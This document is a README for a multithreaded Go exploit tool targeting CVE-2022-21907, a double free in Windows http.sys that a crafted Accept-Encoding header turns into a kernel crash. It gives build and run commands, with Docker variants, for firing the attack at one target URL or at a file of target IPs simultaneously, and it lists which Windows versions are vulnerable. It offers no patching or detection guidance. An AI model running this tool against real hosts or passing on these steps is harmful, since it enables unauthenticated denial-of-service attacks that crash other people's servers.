CVE-2022-21907 - Double Free in http.sys driver.
This is a multithreading Golang application wich allows make requests on few targets simultaneously.
Not very productive with the POST requests but it provides nearly 30% of speed comparing to a linear method.
An unauthenticated attacker can send an HTTP request with an "Accept-Encoding" HTTP request header triggering a double free in the unknown coding-list inside the HTTP Protocol Stack (http.sys) to process packets, resulting in a kernel crash.
Golang:
Golang:
1. git clone https://github.com/iveresk/cve-2022-21907.git
2. cd cve-2022-21907
3. go build cve-2022-21907.go -o /cve-2022-21907
4. chmod +x cve-2022-21907
5. ./cve-2022-21907 -t <targetURL> [or <targetFile>]
Docker Building Local:
1. git clone https://github.com/iveresk/cve-2022-21907.git
2. cd cve-2022-21907
3. nano input.txt [input here your target's IPs in the list]
4. docker build -t <tagName> . || docker build --build-arg INPUT_FILE=<default_target_filename> -t <tagName> .
[In Docker there is a default file named as "input.txt", but you may specify your own one]
5. docker run -it <tagName> || docker run -it -e INPUT_FILE=<target_filename> <tagName>
Docker Repository
docker pull masterrooot/cve-2022-21907:latest
docker run -it <tagName> || docker run -it -e INPUT_FILE=<target_filename> <tagName>
Windows Server 2019 and Windows 10 version 1809:
- Not vulnerable by default. Unless you have set the HTTP Trailer Support.
- Windows 10 version 2004 (build 19041.450): Vulnerable
You are free to contact me via Keybase for any details.